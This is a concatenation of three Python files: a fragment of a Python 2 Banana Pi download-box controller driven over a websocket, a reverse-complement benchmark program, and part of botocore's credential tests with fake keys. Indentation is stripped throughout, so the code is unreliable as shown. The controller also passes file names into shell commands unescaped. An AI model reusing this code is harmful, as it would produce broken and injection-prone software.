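#second apart as 100 - idle_delta*100/total_delta, e.g. total_delta=400
#and idle_delta=300 -> 25.0% CPU in use.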
#Return Memory information (unit=Mb) in a list
def get_RAM_info():
RAMinfo = commands.getoutput("free -m | grep 'Mem' | awk '{print \"Memory||\"$2\"M||\"$3\"M||\"$4\"M\"}'")
return RAMinfo
#Return information about disk space as a list (unit included)
def get_Disk_info():
DiskSpace = commands.getoutput("df -h / | grep 'dev' | awk '{print \"Disk||\"$2\"||\"$3\"||\"$4}'")
return DiskSpace
#The statue of download
def download_statue(x):
base = "/media/udisk/TDDOWNLOAD"
Downloading = ["Downloading"]
Completed = ["Completed"]
cur_list = os.listdir(base)
for item in cur_list:
full_path = os.path.join(base, item)
if os.path.isfile(full_path):
if item.endswith(".td"):
Downloading.append(os.path.splitext(item)[0])
elif item.endswith(".cfg"):
pass
else:
Completed.append(item)
if x==0:
return "||".join(Downloading)
if x==1:
global mark_num
mark_num = len(Completed)-1
return "||".join(Completed)
#Play Movie
def Play_Mov(num):
listStr = download_statue(1)
global mark_num
if mark_num < num:
return "Hello"
playList = listStr.split('||')
playFile = os.path.join( "/media/udisk/TDDOWNLOAD", playList[num] )
commands.getoutput("echo \"loadfile %s\" > /tmp/fifofile" % playFile )
playInfo = "Playing||%s" % ( playList[num] )
return playInfo
#Connect to SAE Channel
def get_url():
while True:
try:
req = urllib2.Request("http://1.mylovefish.sinaapp.com/bananapi.php")
response = urllib2.urlopen(req)
the_page = response.read()
url = the_page.strip()
ws = websocket.create_connection(url)
print url
ws.send("Hello")
pause_flag = 0
volume_flag = 60
playInfoBak = ""
while True:
content = "Hello"
msg = ws.recv()
tmp = msg.split('||')
from_user = tmp[0]
buf = tmp[1]
ws.send("Hello")
if buf == "CPU":
content = get_CPU_info()
elif buf == "Memory":
content = get_RAM_info()
elif buf == "Disk":
content = get_Disk_info()
elif buf == "Downloading":
content = download_statue(0)
elif buf == "Completed":
content = download_statue(1)
elif buf == "Restart":
t = threading.Thread(target=Restart,args=(ws,from_user))
t.setDaemon(True)
t.start()
elif buf == "Close":
commands.getoutput("service xunlei stop")
content = "Close"
elif buf == "ONLED":
commands.getoutput("echo 1 > /sys/class/gpio/gpio18/value")
content = "LEDON"
elif buf == "OFFLED":
commands.getoutput("echo 0 > /sys/class/gpio/gpio18/value")
content = "LEDOFF"
elif buf == "lightdm":
commands.getoutput("ps aux |grep 'mplayer'|grep -v grep|awk '{print $2}'|xargs kill -9")
commands.getoutput("service lightdm restart")
content = "lightdm"
#Play Movie Control
elif buf.isdigit():
num = int(buf)
content = Play_Mov(num)
playInfoBak = content
play_flag = 1
elif buf == "Play2Pause":
if pause_flag == 0:
commands.getoutput("echo \"pause\" > /tmp/fifofile")
pause_flag = 1
content = "Play2Pause"
elif buf == "Pause2Play":
if pause_flag == 1:
commands.getoutput("echo \"pause\" > /tmp/fifofile")
pause_flag = 0
content = "Pause2Play"
elif buf == "StopPlay":
commands.getoutput("echo \"stop\" > /tmp/fifofile")
content = "StoppedPlay"
elif buf == "volumeUp":
volume_flag += 10
commands.getoutput("echo \"volume %d 1\" > /tmp/fifofile" % volume_flag )
content = "volumeUp"
elif buf == "volumeDn":
volume_flag -= 10
commands.getoutput("echo \"volume %d 1\" > /tmp/fifofile" % volume_flag )
content = "volumeDn"
elif buf == "fullscreen":
commands.getoutput("echo \"vo_fullscreen 1\" > /tmp/fifofile")
content = "fullscreen"
elif buf == "exitscreen":
commands.getoutput("echo \"vo_fullscreen 0\" > /tmp/fifofile")
content = "exitscreen"
elif buf == "Playing":
content = playInfoBak
else:
pass
ws.send(from_user+"||"+content)
print content
except BaseException, e:
get_url()
def Restart(ws,from_user):
ws.send(from_user+"||Restarting")
commands.getoutput("service xunlei start")
ws.send(from_user+"||Restart")
if __name__=='__main__':
while True:
try:
get_url()
except BaseException, e:
get_url()
|
reverse_complement_2.py | # The Computer Language Benchmarks Game
# https://salsa.debian.org/benchmarksgame-team/benchmarksgame/
#
# contributed by Joerg Baumann
from sys import stdin, stdout
# from os import cpu_count
from itertools import starmap
reverse_translation = bytes.maketrans(
b'ABCDGHKMNRSTUVWYabcdghkmnrstuvwy',
b'TVGHCDMKNYSAABWRTVGHCDMKNYSAABWR')
def reverse_complement(header, sequence):
t = sequence.translate(reverse_translation, b'\n\r ')
output = bytearray()
trailing_length = len(t) % 60
if trailing_length:
output += b'\n' + t[:trailing_length]
for i in range(trailing_length, len(t), 60):
output += b'\n' + t[i:i+60]
return header, output[::-1]
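# Worked example (illustrative): for sequence b"AAGC", translation gives
# b"TTCG" and reversing yields b"GCTT\n" -- the reverse complement, wrapped
# at 60 columns for longer inputs.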
# @resumable
def read_sequences(file):
for line in file:
if line[0] == ord('>'):
header = line
sequence = bytearray()
for line in file:
if line[0] == ord('>'):
yield header, sequence
header = line
sequence = bytearray()
else:
sequence += line
yield header, sequence
break
# Not used
# def reverse_and_print_task(q, c, v):
# while True:
# i = q.get()
# if i == None:
# break
# h, r = reverse_complement(*data[i])
# with c:
# while i != v.value:
# c.wait()
# write(h)
# write(r)
# flush()
# with c:
# v.value = i + 1
# c.notify_all()
if __name__ == '__main__':
write = stdout.buffer.write
flush = stdout.buffer.flush
s = read_sequences(stdin.buffer)
data = next(s)
# if cpu_count() == 1 or len(data[1]) < 1000000:
# from itertools import starmap
# @resumable(remove_nested=True, lower_yield_from=True)  # undefined in this file; kept for reference
def merge(v, g):
yield v
yield from g
for h, r in starmap(reverse_complement, merge(data, s)):
write(h)
write(r)
flush()
# Not used
# else:
# from multiprocessing import Process, Queue, Value, Condition
# from ctypes import c_int
# data = [data] + list(s)
# q, c, v = (Queue(), Condition(), Value(c_int, 0))
# processes = [Process(target=reverse_and_print_task, args=(q, c, v))
# for _ in range(min(len(data), cpu_count()))]
# for p in processes: p.start()
# for i in range(len(data)): q.put(i)
# for p in processes: q.put(None)
# for p in processes: p.join()
|
test_credentials.py | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import uuid
import threading
import os
import math
import time
import mock
import tempfile
import shutil
from datetime import datetime, timedelta
import sys
from dateutil.tz import tzlocal
from botocore.exceptions import CredentialRetrievalError
from tests import unittest, IntegerRefresher, BaseEnvVar, random_chars
from tests import temporary_file, StubbedSession, SessionHTTPStubber
from botocore import UNSIGNED
from botocore.credentials import EnvProvider, ContainerProvider
from botocore.credentials import InstanceMetadataProvider
from botocore.credentials import Credentials, ReadOnlyCredentials
from botocore.credentials import AssumeRoleProvider, ProfileProviderBuilder
from botocore.credentials import CanonicalNameCredentialSourcer
from botocore.credentials import DeferredRefreshableCredentials
from botocore.credentials import create_credential_resolver
from botocore.credentials import JSONFileCache
from botocore.credentials import SSOProvider
from botocore.config import Config
from botocore.session import Session
from botocore.exceptions import InvalidConfigError, InfiniteLoopConfigError
from botocore.stub import Stubber
from botocore.utils import datetime2timestamp
class TestCredentialRefreshRaces(unittest.TestCase):
def assert_consistent_credentials_seen(self, creds, func):
collected = []
self._run_threads(20, func, collected)
for creds in collected:
# During testing, the refresher uses its current
# refresh count as the values for the access, secret, and
# token value. This means that at any given point in time,
# the credentials should be something like:
#
# ReadOnlyCredentials('1', '1', '1')
# ReadOnlyCredentials('2', '2', '2')
# ...
# ReadOnlyCredentials('30', '30', '30')
#
# This makes it really easy to verify we see a consistent
# set of credentials from the same time period. We just
# check if all the credential values are the same. If
# we ever see something like:
#
# ReadOnlyCredentials('1', '2', '1')
#
# We fail. This is because we're using the access_key
# from the first refresh ('1'), the secret key from
# the second refresh ('2'), and the token from the
# first refresh ('1').
self.assertTrue(creds[0] == creds[1] == creds[2], creds)
def assert_non_none_retrieved_credentials(self, func):
collected = []
self._run_threads(50, func, collected)
for cred in collected:
self.assertIsNotNone(cred)
def _run_threads(self, num_threads, func, collected):
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=func, args=(collected,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_has_no_race_conditions(self):
creds = IntegerRefresher(
creds_last_for=2,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(4000):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
start = time.time()
self.assert_consistent_credentials_seen(creds, _run_in_thread)
end = time.time()
# creds_last_for = 2 seconds (from above)
# So, for example, if execution time took 6.1 seconds, then
# we should see a maximum number of refreshes of ceil(6.1 / 2.0) + 1 = 5
max_calls_allowed = math.ceil((end - start) / 2.0) + 1
self.assertTrue(creds.refresh_counter <= max_calls_allowed,
"Too many cred refreshes, max: %s, actual: %s, "
"time_delta: %.4f" % (max_calls_allowed,
creds.refresh_counter,
(end - start)))
def test_no_race_for_immediate_advisory_expiration(self):
creds = IntegerRefresher(
creds_last_for=1,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(100):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
self.assert_consistent_credentials_seen(creds, _run_in_thread)
def test_no_race_for_initial_refresh_of_deferred_refreshable(self):
def get_credentials():
expiry_time = (
datetime.now(tzlocal()) + timedelta(hours=24)).isoformat()
return {
'access_key': 'my-access-key',
'secret_key': 'my-secret-key',
'token': 'my-token',
'expiry_time': expiry_time
}
deferred_creds = DeferredRefreshableCredentials(
get_credentials, 'fixed')
def _run_in_thread(collected):
frozen = deferred_creds.get_frozen_credentials()
collected.append(frozen)
self.assert_non_none_retrieved_credentials(_run_in_thread)
class BaseAssumeRoleTest(BaseEnvVar):
def setUp(self):
super(BaseAssumeRoleTest, self).setUp()
self.tempdir = tempfile.mkdtemp()
self.config_file = os.path.join(self.tempdir, 'config')
self.environ['AWS_CONFIG_FILE'] = self.config_file
self.environ['AWS_SHARED_CREDENTIALS_FILE'] = str(uuid.uuid4())
def tearDown(self):
shutil.rmtree(self.tempdir)
super(BaseAssumeRoleTest, self).tearDown()
def some_future_time(self):
timeobj = datetime.now(tzlocal())
return timeobj + timedelta(hours=24)
def create_assume_role_response(self, credentials, expiration=None):
if expiration is None:
expiration = self.some_future_time()
response = {
'Credentials': {
'AccessKeyId': credentials.access_key,
'SecretAccessKey': credentials.secret_key,
'SessionToken': credentials.token,
'Expiration': expiration
},
'AssumedRoleUser': {
'AssumedRoleId': 'myroleid',
'Arn': 'arn:aws:iam::1234567890:user/myuser'
}
}
return response
def create_random_credentials(self):
return Credentials(
'fake-%s' % random_chars(15),
'fake-%s' % random_chars(35),
'fake-%s' % random_chars(45)
)
def assert_creds_equal(self, c1, c2):
c1_frozen = c1
if not isinstance(c1_frozen, ReadOnlyCredentials):
c1_frozen = c1.get_frozen_credentials()
c2_frozen = c2
if not isinstance(c2_frozen, ReadOnlyCredentials):
c2_frozen = c2.get_frozen_credentials()
self.assertEqual(c1_frozen, c2_frozen)
def write_config(self, config):
with open(self.config_file, 'w') as f:
f.write(config)
class TestAssumeRole(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRole, self).setUp()
self.environ['AWS_ACCESS_KEY_ID'] = 'access_key'
self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key'
self.metadata_provider = self.mock_provider(InstanceMetadataProvider)
self.env_provider = self.mock_provider(EnvProvider)
self.container_provider = self.mock_provider(ContainerProvider)
self.mock_client_creator = mock.Mock(spec=Session.create_client)
self.actual_client_region = None
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
def mock_provider(self, provider_cls):
mock_instance = mock.Mock(spec=provider_cls)
mock_instance.load.return_value = None
mock_instance.METHOD = provider_cls.METHOD
mock_instance.CANONICAL_NAME = provider_cls.CANONICAL_NAME
return mock_instance
def create_session(self, profile=None):
session = StubbedSession(profile=profile)
# We have to set bogus credentials here, otherwise we'll trigger
# an early credential chain resolution.
sts = session.create_client(
'sts',
aws_access_key_id='spam',
aws_secret_access_key='eggs',
)
self.mock_client_creator.return_value = sts
assume_role_provider = AssumeRoleProvider(
load_config=lambda: session.full_config,
client_creator=self.mock_client_creator,
cache={},
profile_name=profile,
credential_sourcer=CanonicalNameCredentialSourcer([
self.env_provider, self.container_provider,
self.metadata_provider
]),
profile_provider_builder=ProfileProviderBuilder(
session,
sso_token_cache=JSONFileCache(self.tempdir),
),
)
stubber = session.stub('sts')
stubber.activate()
component_name = 'credential_provider'
resolver = session.get_component(component_name)
available_methods = [p.METHOD for p in resolver.providers]
replacements = {
'env': self.env_provider,
'iam-role': self.metadata_provider,
'container-role': self.container_provider,
'assume-role': assume_role_provider
}
for name, provider in replacements.items():
try:
index = available_methods.index(name)
except ValueError:
# The provider isn't in the session
continue
resolver.providers[index] = provider
session.register_component(
'credential_provider', resolver
)
return session, stubber
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_environment_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
environment_creds = self.create_random_credentials()
self.env_provider.load.return_value = environment_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.env_provider.load.call_count, 1)
def test_instance_metadata_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Ec2InstanceMetadata\n'
)
self.write_config(config)
metadata_creds = self.create_random_credentials()
self.metadata_provider.load.return_value = metadata_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.metadata_provider.load.call_count, 1)
def test_container_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = EcsContainer\n'
)
self.write_config(config)
container_creds = self.create_random_credentials()
self.container_provider.load.return_value = container_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.container_provider.load.call_count, 1)
def test_invalid_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = CustomInvalidProvider\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_misconfigured_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials().get_frozen_credentials()
def test_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_b_creds = self.create_random_credentials()
profile_b_response = self.create_assume_role_response(profile_b_creds)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_b_response)
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_recursive_assume_role_stops_at_static_creds(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_infinitely_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
)
self.write_config(config)
with self.assertRaises(InfiniteLoopConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_process_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'credential_process = %s\n' % self.credential_process
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# credential process.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': 'spam',
'aws_secret_access_key': 'eggs',
'aws_session_token': None,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, stubber = self.create_session(profile='A')
identity_creds = self.create_random_credentials()
identity_response = self.create_assume_role_response(identity_creds)
stubber.add_response(
'assume_role_with_web_identity',
identity_response,
)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# assume role with web identity call.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': identity_creds.access_key,
'aws_secret_access_key': identity_creds.secret_key,
'aws_session_token': identity_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# The config is split between the profile and the env; we
# should only be looking at the profile, so this should raise
# a configuration error.
with self.assertRaises(InvalidConfigError):
session.get_credentials()
def test_sso_source_profile(self):
token_cache_key = 'f395038c92f1828cbb3991d2d6152d326b895606'
cached_token = {
'accessToken': 'a.token',
'expiresAt': self.some_future_time(),
}
temp_cache = JSONFileCache(self.tempdir)
temp_cache[token_cache_key] = cached_token
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'sso_region = us-east-1\n'
'sso_start_url = https://test.url/start\n'
'sso_role_name = SSORole\n'
'sso_account_id = 1234567890\n'
)
self.write_config(config)
session, sts_stubber = self.create_session(profile='A')
client_config = Config(
region_name='us-east-1',
signature_version=UNSIGNED,
)
sso_stubber = session.stub('sso', config=client_config)
sso_stubber.activate()
# The expiration needs to be in milliseconds
expiration = datetime2timestamp(self.some_future_time()) * 1000
sso_role_creds = self.create_random_credentials()
sso_role_response = {
'roleCredentials': {
'accessKeyId': sso_role_creds.access_key,
'secretAccessKey': sso_role_creds.secret_key,
'sessionToken': sso_role_creds.token,
'expiration': int(expiration),
}
}
sso_stubber.add_response('get_role_credentials', sso_role_response)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
sts_stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
sts_stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# SSO get role credentials response
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': sso_role_creds.access_key,
'aws_secret_access_key': sso_role_creds.secret_key,
'aws_session_token': sso_role_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_credential_source_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = token_path
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# We should not get credentials from web-identity configured in the
# environment when the Environment credential_source is set.
# There are no Environment credentials, so this should raise a
# retrieval error.
with self.assertRaises(CredentialRetrievalError):
session.get_credentials()
def test_self_referential_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def create_stubbed_sts_client(self, session):
expected_creds = self.create_random_credentials()
_original_create_client = session.create_client
def create_client_sts_stub(service, *args, **kwargs):
client = _original_create_client(service, *args, **kwargs)
stub = Stubber(client)
response = self.create_assume_role_response(expected_creds)
self.actual_client_region = client.meta.region_name
stub.add_response('assume_role', response)
stub.activate()
return client
return create_client_sts_stub, expected_creds
def test_assume_role_uses_correct_region(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
# Verify that when we configure the session with a specific region
# that we use that region when creating the sts client.
session.set_config_variable('region', 'cn-north-1')
create_client, expected_creds = self.create_stubbed_sts_client(session)
session.create_client = create_client
resolver = create_credential_resolver(session)
provider = resolver.get_provider('assume-role')
creds = provider.load()
self.assert_creds_equal(creds, expected_creds)
self.assertEqual(self.actual_client_region, 'cn-north-1')
class TestAssumeRoleWithWebIdentity(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRoleWithWebIdentity, self).setUp()
self.token_file = os.path.join(self.tempdir, 'token.jwt')
self.write_token('totally.a.token')
def write_token(self, token, path=None):
if path is None:
path = self.token_file
with open(path, 'w') as f:
f.write(token)
def assert_session_credentials(self, expected_params, **kwargs):
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session = StubbedSession(**kwargs)
stubber = session.stub('sts')
stubber.add_response(
'assume_role_with_web_identity',
response,
expected_params
)
stubber.activate()
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = sname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'sname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
def test_assume_role_env_vars(self):
config = (
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = self.token_file
self.environ['AWS_ROLE_SESSION_NAME'] = 'bname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleB',
'RoleSessionName': 'bname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params)
def test_assume_role_env_vars_do_not_take_precedence(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = aname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
different_token = os.path.join(self.tempdir, str(uuid.uuid4()))
self.write_token('totally.different.token', path=different_token)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleC'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = different_token
self.environ['AWS_ROLE_SESSION_NAME'] = 'cname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'aname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
class TestProcessProvider(unittest.TestCase):
def setUp(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
self.environ = os.environ.copy()
self.environ_patch = mock.patch('os.environ', self.environ)
self.environ_patch.start()
def tearDown(self):
self.environ_patch.stop()
def test_credential_process(self):
config = (
'[profile processcreds]\n'
'credential_process = %s\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
credentials = Session(profile='processcreds').get_credentials()
self.assertEqual(credentials.access_key, 'spam')
self.assertEqual(credentials.secret_key, 'eggs')
def test_credential_process_returns_error(self):
config = (
'[profile processcreds]\n'
'credential_process = %s --raise-error\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
session = Session(profile='processcreds')
# This regex validates that there is no substring b' in the
# error message. The reason we want to validate that is to make
# sure that stderr is actually decoded, so that in exceptional
# cases the error is properly formatted.
# As for how the regex works:
# `(?!b')` is a negative lookahead, meaning the match only
# succeeds if the current position is not followed by the
# pattern `b'`. Combined with the `.` it matches any single
# character that does not start that pattern. `((?!b').)*` does
# that zero or more times. The final pattern adds `^` and `$` to
# anchor the beginning and end of the string so we know the
# whole string is consumed. Finally `(?s)` at the beginning
# makes dots match newlines so we can handle a multi-line string.
reg = r"(?s)^((?!b').)*$"
with self.assertRaisesRegex(CredentialRetrievalError, reg):
session.get_credentials()
class TestSTSRegional(BaseAssumeRoleTest):
def add_assume_role_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRole'))
def add_assume_role_with_web_identity_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRoleWithWebIdentity'))
def _get_assume_role_body(self, method_name):
expiration = self.some_future_time()
body = (
'<{method_name}Response>'
' <{method_name}Result>'
' <AssumedRoleUser>'
' <Arn>arn:aws:sts::0123456:user</Arn>'
' <AssumedRoleId>AKID:mysession-1567020004</AssumedRoleId>'
' </AssumedRoleUser>'
' <Credentials>'
' <AccessKeyId>AccessKey</AccessKeyId>'
' <SecretAccessKey>SecretKey</SecretAccessKey>'
' <SessionToken>SessionToken</SessionToken>'
' <Expiration>{expiration}</Expiration>'
' </Credentials>'
' </{method_name}Result>'
'</{method_name}Response>'
).format(method_name=method_name, expiration=expiration)
return body.encode('utf-8')
def make_stubbed_client_call_to_region(self, session, stubber, region):
ec2 = session.create_client('ec2', region_name=region)
stubber.add_response(body=b'<DescribeRegionsResponse/>')
ec2.describe_regions()
def test_assume_role_uses_same_region_as_client(self):
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
def test_assume_role_web_identity_uses_same_region_as_client(self):
token_file = os.path.join(self.tempdir, 'token.jwt')
with open(token_file, 'w') as f:
f.write('some-token')
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
